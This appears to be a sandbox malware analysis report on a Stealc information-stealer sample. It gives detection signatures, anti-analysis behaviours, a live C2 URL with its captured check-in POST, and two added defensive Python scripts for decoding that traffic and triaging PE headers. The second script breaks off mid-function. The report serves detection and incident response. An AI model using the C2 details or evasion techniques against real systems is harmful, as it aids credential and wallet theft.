
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1542946
MD5: aa9612d185f329e0f4b0a9525de3b0e1
SHA1: 21ad52db3ebef421c02c82070c1ee13ad6c03620
SHA256: c732cac1942cf6a53dbad592bd7599b3410b8f9f090f79060ddd0f6e4d3abd6b
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7048 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AA9612D185F329E0F4B0A9525DE3B0E1)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings whose development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads seven legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Extracted malware configuration: {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
Yara matches

Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.1786322649.000000000069E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1745824943.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 7048 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 7048 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.910000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-26T23:15:08.696725+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | TCP


                AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.910000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00919AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00917240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00919B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00928EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009238B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00924910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00924570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00923EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009116D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GCFIIEBKEGHJJJJJJDAA | Host: 185.215.113.206 | Content-Length: 209 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 39 43 39 34 31 35 34 36 39 36 39 36 36 30 36 35 39 30 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 2d 2d 0d 0a | Data Ascii (CRLF shown as \r\n): ------GCFIIEBKEGHJJJJJJDAA\r\nContent-Disposition: form-data; name="hwid"\r\n\r\n3D9C9415469696606590\r\n------GCFIIEBKEGHJJJJJJDAA\r\nContent-Disposition: form-data; name="build"\r\n\r\npuma\r\n------GCFIIEBKEGHJJJJJJDAA--\r\n
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00914880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: file.exe, 00000000.00000002.1786322649.000000000069E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1786322649.00000000006E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/DCBF360B3297E19BA487R
Source: file.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1786322649.000000000069E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php/
Source: file.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpF
Source: file.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpP
Source: file.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpZ
Source: file.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php~
Source: file.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/lC
Source: file.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/ws
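The check-in the Suricata rule fires on is a plain multipart/form-data POST carrying only two fields. The script below is an added example, not code from the Joe Sandbox report or from Stealc itself: it decodes the Data Raw bytes quoted in the report and pulls the fields out of the body, so the hardware id and build name can be used as pivots (the build value "puma" is the same string the configuration extractor reports as "Botnet"). The `looks_like_stealc_checkin` heuristic is an assumption drawn from this single capture, not a documented protocol constant; treat it as a triage hint, not a signature.

```python
import re

# Request data copied from the report above: the Content-Type header of the
# POST /e2b1563c6670f193.php request and its 209-byte body as shown under "Data Raw".
CAPTURED_CONTENT_TYPE = "multipart/form-data; boundary=----GCFIIEBKEGHJJJJJJDAA"
CAPTURED_BODY_HEX = (
    "2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 "
    "6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 39 43 39 34 31 35 34 36 39 36 39 36 36 30 36 35 39 30 0d 0a "
    "2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 "
    "6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a "
    "2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 2d 2d 0d 0a"
)


def boundary_from_content_type(content_type: str) -> bytes:
    """Extract the boundary parameter of a multipart/form-data Content-Type."""
    match = re.search(r'boundary="?([^";\s]+)"?', content_type)
    if not match:
        raise ValueError("Content-Type carries no boundary parameter")
    return match.group(1).encode("ascii")


def parse_multipart_form(body: bytes, content_type: str) -> dict:
    """Map form field names to values for a multipart/form-data body.

    Per RFC 2046 each part is introduced by "--" + boundary and the body ends
    with "--" + boundary + "--". Values are decoded as latin-1 so that any
    byte survives; callers can re-decode fields they know to be UTF-8.
    """
    delimiter = b"--" + boundary_from_content_type(content_type)
    fields = {}
    for chunk in body.split(delimiter):
        chunk = chunk.strip(b"\r\n")  # CRLF that frames each part
        if not chunk or chunk == b"--":  # preamble/epilogue or the closing "--"
            continue
        headers, separator, value = chunk.partition(b"\r\n\r\n")
        if not separator:
            continue  # malformed part without a header/body split
        name = re.search(rb'name="([^"]*)"', headers)
        if name:
            fields[name.group(1).decode("latin-1")] = value.decode("latin-1")
    return fields


def looks_like_stealc_checkin(fields: dict) -> bool:
    """Heuristic shape of the first check-in seen in this capture: exactly an
    alphanumeric 'hwid' and a non-empty 'build'. Assumption from one sample,
    not a documented protocol constant."""
    if set(fields) != {"hwid", "build"}:
        return False
    return bool(re.fullmatch(r"[0-9A-Za-z]{8,}", fields["hwid"])) and bool(fields["build"])


def summarize_checkin(body_hex: str, content_type: str) -> dict:
    """Decode a hex dump of a request body and report what a responder cares about."""
    body = bytes.fromhex(body_hex)
    fields = parse_multipart_form(body, content_type)
    return {
        "content_length": len(body),  # should equal the Content-Length header (209 here)
        "fields": fields,
        "stealc_like": looks_like_stealc_checkin(fields),
    }


if __name__ == "__main__":
    print(summarize_checkin(CAPTURED_BODY_HEX, CAPTURED_CONTENT_TYPE))
```

Feed any other captured body through `summarize_checkin()` by pasting its hex dump; the parser does not assume field order or count, only the heuristic does. The hwid is the value to search for across other captures from the same infrastructure, since the same infected host will present it on every request.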

                System Summary

Source: file.exe | Static PE information: section name: (empty or non-printable)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty or non-printable)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA8A2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CED01D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDD032
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CE818B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C36937
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D83A55
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CE4A7C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BA7A65
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CD63EB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CEBCC1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDFC24
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C07C35
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDDDDC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CD753A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CD8EAF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CBFE5E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C51E09
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 009145C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: qyeleazo ZLIB complexity 0.99490058910162
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00928680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00923720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\CK3S1OV1.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1894400 > 1048576
Source: file.exe | Static PE information: Raw size of qyeleazo is bigger than: 0x100000 < 0x1a8600

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.910000.0.unpack | section rights in memory: (unnamed):EW; .rsrc:W; .idata:W; (unnamed):EW; qyeleazo:EW; wadukluq:EW; .taggant:EW | on disk: (unnamed):ER; .rsrc:W; .idata:W; (unnamed):EW; qyeleazo:EW; wadukluq:EW; .taggant:EW (only the first, unnamed section changes, from ER on disk to EW in memory)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00929860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1d1e52 should be: 0x1d439d
Source: file.exe | Static PE information: section name: (empty or non-printable)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty or non-printable)
Source: file.exe | Static PE information: section name: qyeleazo
Source: file.exe | Static PE information: section name: wadukluq
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBF0CA push 0EF14A9Bh; mov dword ptr [esp], eax (at 0_2_00DBF115)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D560C1 push 5EB4D8F6h; mov dword ptr [esp], ecx (at 0_2_00D56104)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DAF8F7 push 6FA4CDE1h; mov dword ptr [esp], ebx (at 0_2_00DAF909)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D56884 push edx; mov dword ptr [esp], esi (at 0_2_00D568A7)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D5A8BF push ebx; mov dword ptr [esp], ecx (at 0_2_00D5A946)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA8A2 push eax; mov dword ptr [esp], ebp (at 0_2_00CDA952)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA8A2 push 2FBD9A26h; mov dword ptr [esp], edx (at 0_2_00CDA95A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA8A2 push 2F31678Ah; mov dword ptr [esp], eax (at 0_2_00CDA9AC)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA8A2 push edx; mov dword ptr [esp], esi (at 0_2_00CDA9FE)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA8A2 push 6CFC02C6h; mov dword ptr [esp], ecx (at 0_2_00CDAA0F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA8A2 push eax; mov dword ptr [esp], ecx (at 0_2_00CDAA27)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA8A2 push 710E47B8h; mov dword ptr [esp], edi (at 0_2_00CDAA83)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA8A2 push esi; mov dword ptr [esp], 7514F3DDh (at 0_2_00CDAA9C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA8A2 push ecx; mov dword ptr [esp], 3F8F3291h (at 0_2_00CDAAA8)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA8A2 push esi; mov dword ptr [esp], edi (at 0_2_00CDAAF0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA8A2 push 75823B78h; mov dword ptr [esp], edi (at 0_2_00CDAB4B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA8A2 push 65B70D32h; mov dword ptr [esp], edi (at 0_2_00CDABCB)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA8A2 push edi; mov dword ptr [esp], esi (at 0_2_00CDAC07)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA8A2 push 143BF9E2h; mov dword ptr [esp], edx (at 0_2_00CDACA4)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA8A2 push ebx; mov dword ptr [esp], 7F0EB2D6h (at 0_2_00CDAD4E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA8A2 push ebp; mov dword ptr [esp], eax (at 0_2_00CDAE6D)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA8A2 push 7DDA32EFh; mov dword ptr [esp], eax (at 0_2_00CDAE7C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA8A2 push eax; mov dword ptr [esp], edi (at 0_2_00CDAEB1)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA8A2 push edi; mov dword ptr [esp], esi (at 0_2_00CDAEDD)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA8A2 push 2155D56Fh; mov dword ptr [esp], ecx (at 0_2_00CDAF11)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA8A2 push 3220720Fh; mov dword ptr [esp], ebp (at 0_2_00CDAF1B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA8A2 push ecx; mov dword ptr [esp], 7FAFA64Eh (at 0_2_00CDAFA8)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA8A2 push edx; mov dword ptr [esp], edi (at 0_2_00CDAFE2)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA8A2 push 4C5B5C61h; mov dword ptr [esp], eax (at 0_2_00CDB02A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA8A2 push 6C328581h; mov dword ptr [esp], ecx (at 0_2_00CDB05E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA8A2 push esi; mov dword ptr [esp], eax (at 0_2_00CDB154)
Source: file.exe | Static PE information: section name: qyeleazo entropy: 7.954246501393021
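The Data Obfuscation findings above are all static header properties: a stored checksum (0x1d1e52) that differs from the recomputed one (0x1d439d), section names no linker emits (qyeleazo, wadukluq, .taggant, two unnamed ones), sections that are both writable and executable, and an entry point inside .taggant rather than in a code section. The Python below is an added example, not code from the report or from Joe Sandbox, that reproduces those checks with nothing but `struct`. It runs on a small two-section PE32 constructed inside the script (`build_sample_pe`, not the analysed sample), and `triage()` accepts the bytes of any real file. The checksum routine follows the CheckSumMappedFile algorithm as pefile implements it.

```python
import struct

IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE = 0x00000020, 0x20000000
IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x40000000, 0x80000000
# Names the usual linkers emit; anything else deserves a second look.
STANDARD_SECTION_NAMES = {".text", ".data", ".rdata", ".bss", ".idata", ".edata",
                          ".rsrc", ".reloc", ".tls", ".pdata", ".CRT", ".didat"}

def pe_header_offset(data: bytes) -> int:
    """Locate the PE signature via e_lfanew; refuse anything that is not a PE."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    return e_lfanew

def checksum_offset(data: bytes) -> int:
    # CheckSum is at +0x40 in the optional header, which follows the 4-byte
    # signature and the 20-byte COFF header (same offset for PE32 and PE32+).
    return pe_header_offset(data) + 24 + 0x40

def stored_checksum(data: bytes) -> int:
    return struct.unpack_from("<I", data, checksum_offset(data))[0]

def pe_checksum(data: bytes) -> int:
    """Recompute the header checksum as CheckSumMappedFile does: ones'-complement
    sum of the file as 32-bit words, skipping the CheckSum field itself,
    folded to 16 bits, plus the file size."""
    skip = checksum_offset(data)
    padded = data + b"\x00" * (-len(data) % 4)
    total = 0
    for offset in range(0, len(padded), 4):
        if offset == skip:
            continue
        total += struct.unpack_from("<I", padded, offset)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)  # end-around carry
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)

def set_checksum(data: bytes, value: int) -> bytes:
    patched = bytearray(data)
    struct.pack_into("<I", patched, checksum_offset(data), value)
    return bytes(patched)

def parse_sections(data: bytes) -> list:
    """Name, virtual range, raw size and E/R/W rights of every section header."""
    pe = pe_header_offset(data)
    count, = struct.unpack_from("<H", data, pe + 6)
    opt_size, = struct.unpack_from("<H", data, pe + 20)
    sections = []
    for i in range(count):
        off = pe + 24 + opt_size + 40 * i
        name = data[off:off + 8].rstrip(b"\x00").decode("latin-1")
        vsize, vaddr, rawsize = struct.unpack_from("<III", data, off + 8)
        chars, = struct.unpack_from("<I", data, off + 36)
        rights = "".join(letter for letter, bit in (("E", IMAGE_SCN_MEM_EXECUTE),
                         ("R", IMAGE_SCN_MEM_READ), ("W", IMAGE_SCN_MEM_WRITE)) if chars & bit)
        sections.append({"name": name, "vaddr": vaddr, "vsize": vsize,
                         "rawsize": rawsize, "rights": rights})
    return sections

def entry_point_section(data: bytes, sections: list):
    """Name of the section holding AddressOfEntryPoint (optional header +16)."""
    entry, = struct.unpack_from("<I", data, pe_header_offset(data) + 24 + 16)
    for s in sections:
        if s["vaddr"] <= entry < s["vaddr"] + max(s["vsize"], s["rawsize"]):
            return s["name"]
    return None

def triage(data: bytes) -> dict:
    """The static checks the report raises, on one file."""
    sections = parse_sections(data)
    stored, computed = stored_checksum(data), pe_checksum(data)
    return {
        "stored_checksum": stored, "computed_checksum": computed, "checksum_ok": stored == computed,
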